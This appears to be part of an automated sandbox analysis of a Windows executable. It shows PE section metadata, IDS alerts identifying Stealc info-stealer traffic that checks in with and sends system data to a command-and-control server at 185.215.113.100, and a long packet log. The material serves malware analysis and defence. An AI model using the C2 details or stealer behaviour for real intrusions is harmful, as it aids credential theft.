              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [ecx], al
              add byte ptr [eax], 00000000h
              add byte ptr [eax], al
              add byte ptr [eax], al
              adc byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add ecx, dword ptr [edx]
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              Programming Language:
              • [C++] VS2010 build 30319
              • [ASM] VS2010 build 30319
              • [ C ] VS2010 build 30319
              • [ C ] VS2008 SP1 build 30729
              • [IMP] VS2008 SP1 build 30729
              • [LNK] VS2010 build 30319
              NameVirtual AddressVirtual Size Is in Section
              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_IMPORT0x23f0500x64.idata
              IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
              IMAGE_DIRECTORY_ENTRY_BASERELOC0x23f1f80x8.idata
              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_IAT0x00x0
              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
              0x10000x23d0000x13c00a75d8ed324c58f23bb397bd007bf0e84unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              .rsrc 0x23e0000x10000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              .idata 0x23f0000x10000x200380655991303f284fcb90ef8e49522a1False0.1328125data0.9064079259880791IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              0x2400000x2af0000x200a427a3e0924154632458d0533b08b19funknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              cwrvobrg0x4ef0000x1a80000x1a780041222e9219b12d1792e3be4965c82611False0.9947073079619244data7.95287821777637IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              olxkocyk0x6970000x10000x600b57b997fdd0afc5b10a0979d357e8a82False0.587890625data5.106514580872822IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              .taggant0x6980000x30000x2200bbf49a72e759be255727e63626e8af75False0.06215533088235294DOS executable (COM)0.783854624625388IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              DLLImport
              kernel32.dlllstrcpy
              TimestampProtocolSIDSignatureSeveritySource PortDest PortSource IPDest IP
              2024-09-01T23:02:56.268443+0200TCP2044246ET MALWARE Win32/Stealc Requesting plugins Config from C214973080192.168.2.4185.215.113.100
              2024-09-01T23:02:55.982267+0200TCP2044244ET MALWARE Win32/Stealc Requesting browsers Config from C214973080192.168.2.4185.215.113.100
              2024-09-01T23:02:58.882814+0200TCP2044248ET MALWARE Win32/Stealc Submitting System Information to C214973080192.168.2.4185.215.113.100
              2024-09-01T23:02:55.988260+0200TCP2044245ET MALWARE Win32/Stealc Active C2 Responding with browsers Config18049730185.215.113.100192.168.2.4
              2024-09-01T23:02:55.694309+0200TCP2044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in14973080192.168.2.4185.215.113.100
              2024-09-01T23:02:56.275329+0200TCP2044247ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config18049730185.215.113.100192.168.2.4
              2024-09-01T23:02:59.442106+0200TCP2803304ETPRO MALWARE Common Downloader Header Pattern HCa34973080192.168.2.4185.215.113.100
              TimestampSource PortDest PortSource IPDest IP
              Sep 1, 2024 23:02:54.576608896 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:02:54.583714962 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:02:54.583802938 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:02:54.583930016 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:02:54.590832949 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:02:55.389348030 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:02:55.389415026 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:02:55.391875982 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:02:55.396707058 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:02:55.694243908 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:02:55.694308996 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:02:55.695233107 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:02:55.700027943 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:02:55.982058048 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:02:55.982109070 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:02:55.982266903 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:02:55.982266903 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:02:55.983489990 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:02:55.988260031 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:02:56.268379927 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:02:56.268434048 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:02:56.268445015 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:02:56.268443108 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:02:56.268485069 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:02:56.268512964 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:02:56.268524885 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:02:56.268534899 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:02:56.268553019 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:02:56.268585920 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:02:56.269284964 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:02:56.269296885 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:02:56.269340038 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:02:56.270522118 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:02:56.275329113 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:02:57.316217899 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:02:57.316376925 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:02:57.331969023 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:02:57.332015991 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:02:57.336714983 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:02:57.336817026 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:02:57.336849928 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:02:57.336865902 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:02:57.337002039 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:02:57.337011099 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:02:58.882740021 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:02:58.882813931 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:02:59.155009985 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:02:59.159812927 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:02:59.442027092 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:02:59.442042112 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:02:59.442106009 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:02:59.442140102 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:02:59.442193985 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:02:59.442204952 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:02:59.442212105 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:02:59.442230940 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:02:59.442234039 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:02:59.442256927 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:02:59.442991018 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:02:59.443011999 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:02:59.443021059 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:02:59.443023920 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:02:59.443042994 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:02:59.443078041 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:02:59.525824070 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:02:59.525834084 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:02:59.525903940 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:02:59.649599075 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:02:59.649617910 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:02:59.649627924 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:02:59.649671078 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:02:59.649698973 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:02:59.649835110 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:02:59.649883986 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:02:59.649899960 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:02:59.649909019 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:02:59.649939060 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:02:59.649950981 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:02:59.650350094 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:02:59.650393963 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:02:59.650404930 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:02:59.650408030 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:02:59.650433064 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:02:59.650443077 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:02:59.687701941 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:02:59.687719107 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:02:59.687827110 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:02:59.687834978 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:02:59.687854052 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:02:59.687855005 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:02:59.687884092 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:02:59.687884092 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:02:59.849373102 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:02:59.849385023 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:02:59.849467993 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:02:59.849484921 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:02:59.849502087 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:02:59.849688053 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:02:59.849688053 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:02:59.849711895 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:02:59.849729061 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:02:59.849769115 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:02:59.849781036 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:02:59.850096941 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:02:59.850109100 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:02:59.850120068 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:02:59.850131035 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:02:59.850145102 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:02:59.850187063 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:00.248903990 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:00.248928070 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:00.249070883 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:00.249070883 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:00.331468105 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:00.331525087 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:00.331650019 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:00.331650019 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:00.448050976 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:00.448061943 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:00.448071957 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:00.448103905 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:00.448250055 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:00.448250055 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:00.448322058 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:00.448369026 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:00.448370934 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:00.448379993 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:00.448419094 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:00.652517080 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:00.652529001 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:00.652570963 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:00.652575970 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:00.652616024 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:00.652620077 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:00.652661085 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:00.655102015 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:00.655112028 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:00.655185938 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:00.655189991 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:00.655227900 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:00.655245066 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:00.655255079 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:00.655302048 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:00.844213963 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:00.844223976 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:00.844295979 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:00.845496893 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:00.845558882 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:00.845572948 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:00.845583916 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:00.845613003 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:00.845626116 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:00.845700026 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:00.845748901 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:00.845760107 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:00.845772982 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:00.845808983 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:00.845813036 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:00.845850945 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:01.043200970 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:01.043219090 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:01.043298960 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:01.043519020 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:01.043556929 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:01.043572903 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:01.043751001 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:01.303809881 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:01.303829908 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:01.303993940 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:01.461384058 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:01.461431026 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:01.461504936 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:01.461574078 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:01.461574078 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:01.461574078 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:01.461601019 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:01.461612940 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:01.461643934 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:01.461656094 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:01.461673975 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:01.461688995 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:01.461715937 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:01.461745977 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:01.462508917 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:01.462560892 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:01.544181108 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:01.544394970 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:01.865370035 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:01.865382910 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:01.865392923 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:01.865468979 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:01.865515947 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:01.865525961 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:01.865536928 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:01.865549088 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:01.865561008 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:01.865641117 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:01.865641117 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:01.865641117 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:01.865641117 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:01.865641117 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:01.865641117 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:01.865653992 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:01.865690947 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:02.147804976 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:02.147816896 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:02.147829056 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:02.147861004 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:02.147870064 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:02.148039103 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:02.148039103 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:02.476150036 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:02.476161003 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:02.476171017 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:02.476224899 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:02.476259947 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:02.476264000 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:02.476274967 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:02.476288080 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:02.476299047 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:02.476313114 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:02.476351023 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:02.476968050 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:02.476991892 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:02.477003098 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:02.477008104 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:02.477032900 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:02.477046013 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:02.477125883 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:02.477139950 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:02.477161884 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:02.477173090 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:02.685180902 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:02.685206890 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:02.685364962 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:02.685364962 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:03.135831118 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:03.135842085 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:03.136037111 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:03.220365047 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:03.220417023 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:03.220537901 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:03.220537901 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:03.315814972 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:03.315880060 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:03.315890074 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:03.315982103 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:03.315982103 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:03.315994978 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:03.316039085 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:03.316059113 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:03.316067934 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:03.316107035 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:03.333264112 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:03.333312988 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:03.333323956 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:03.333425045 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:03.333425045 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:03.724209070 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:03.724222898 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:03.724241972 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:03.724335909 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:03.724348068 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:03.724406004 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:03.724406004 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:03.724406958 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:03.724450111 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:03.724459887 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:03.724500895 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:03.724519968 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:03.724678040 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:03.724725008 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:03.724726915 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:03.724736929 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:03.724767923 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:03.724781990 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:03.724812984 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:03.724824905 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:03.724836111 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:03.724848986 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:03.724860907 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:03.724890947 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:04.554652929 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:04.554675102 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:04.554719925 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:04.554750919 CEST4973080192.168.2.4185.215.113.100
